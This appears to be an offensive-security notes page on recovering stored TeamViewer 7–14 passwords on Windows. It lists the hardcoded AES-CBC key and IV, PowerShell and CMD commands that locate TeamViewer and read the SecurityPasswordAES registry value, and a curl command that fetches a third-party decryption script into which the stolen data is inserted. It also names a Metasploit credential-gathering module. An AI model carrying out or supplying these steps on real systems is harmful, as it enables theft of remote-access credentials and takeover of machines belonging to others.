PRIMARY CATEGORY → APPLICATION CREDENTIALS

Theory

Password Encryption Method

From TeamViewer 7 to TeamViewer 14, password are stored in encrypted form using the following data →

SecurityPasswordExported required for TeamViewer 14

  • Encryption Algorithm

AES-CBC

  • Symmetric Encryption Key
0602000000a400005253413100040000
  • Initialization Vector
0100010067244F436E6762F25EA8D704

Enumeration

Running Processes

CMD & PS

tasklist /svc

PS

Get-Process -Name '*TeamViewer*' | Select ProcessName, Id
Get-CIMInstance -ClassName win32_process | ? { $_.Name -Match 'TeamViewer' } | Select Name, ProcessID
Running Services

CMD & PS

sc.exe queryex

PS

Get-Service -Name '*Teamviewer*' | Select Name, Status
Get-CIMInstance -ClassName win32_service | ? { $_.Name -Match 'Teamviewer' } | Select Name, State
Installed Software
System Directories

i.e. “Program Files” and “Program Files (x86)“

dir -Path 'C:\Progra~1' -Filter '*TeamViewer*' # Program Files
dir -Path 'C:\Progra~2' -Filter '*TeamViewer*' # Program Files (x86)
COM | CIM

CMD & PS

wmic product get name | findstr /I vpn

PS

Get-WMIObject -Class Win32_Product | ? { $_.Name -Match 'TeamViewer' } | Select Name, Version
Get-CimInstance -ClassName win32_product | ? { $_.Name -Match 'Teamviewer' } | Select Name, Version
Windows Registry

PS


Abuse - TeamViewer 7

Extracting Encrypted Secrets

Namely, SecurityPasswordAES

PS

(Get-ItemProperty 'HKLM:\Software\WOW6432Node\Teamviewer\Version7').SecurityPasswordAES -join ','
Decrypting Data

Setup

curl --silent --location --request GET 'https://raw.githubusercontent.com/S12cybersecurity/Decrypt-TeamViewer-Password/refs/heads/main/password.py' | sed 's@ADD HERE@<ENCRYPTED_DATA>@g' > decrypt.py # Comma-separated
python3 -m venv .venv
. !$/bin/activate && pip3 install pycryptodome

Usage

python3 decrypt.py

post/windows/gather/credentials/teamviewer_passwords


Resources

Why not Security: TeamViewer